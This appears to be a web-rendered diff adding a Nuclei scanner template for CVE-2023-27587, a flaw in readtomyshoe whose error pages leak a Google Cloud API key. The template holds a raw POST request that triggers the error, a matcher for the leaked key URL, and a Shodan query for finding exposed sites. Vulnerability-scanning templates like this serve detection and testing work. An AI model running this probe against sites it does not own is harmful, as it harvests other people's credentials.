🤬
  • ■ ■ ■ ■ ■ ■
    nuclei-templates/cves/2023/CVE-2023-27587.yaml
     1 +id: CVE-2023-27587
     2 + 
     3 +info:
     4 + name: readtomyshoe - Google Cloud API Disclosure
     5 + author: vagnerd
     6 + severity: high
     7 + description: |
     8 + If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.
     9 + reference:
     10 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
     11 + - https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
     12 + - https://github.com/sec-fx/CVE-2023-27587-PoC
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
     15 + cvss-score: 7.4
     16 + cve-id: CVE-2023-27587
     17 + cwe-id: CWE-209
     18 + metadata:
     19 + shodan-query: http.html:"readtomyshoe" || title:"ReadToMyShoe"
     20 + verified: "true"
     21 + tags: cve,cve2023,leak,debug,readtomyshoe
     22 + 
     23 +requests:
     24 + - raw:
     25 + - |
     26 + POST /api/add-article-by-text HTTP/1.1
     27 + Host: {{Hostname}}
     28 + Accept-Encoding: gzip, deflate
     29 + Content-Type: application/json
     30 + 
     31 + {
     32 + "title":"Kernsicherheitstest",
     33 + "body":"Kernsicherheitstest"
     34 + }
     35 + 
     36 + matchers-condition: and
     37 + matchers:
     38 + - type: status
     39 + status:
     40 + - 500
     41 + 
     42 + - type: dsl
     43 + dsl:
     44 + - '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'
     45 + 
Please wait...
Page is in error, reload to recover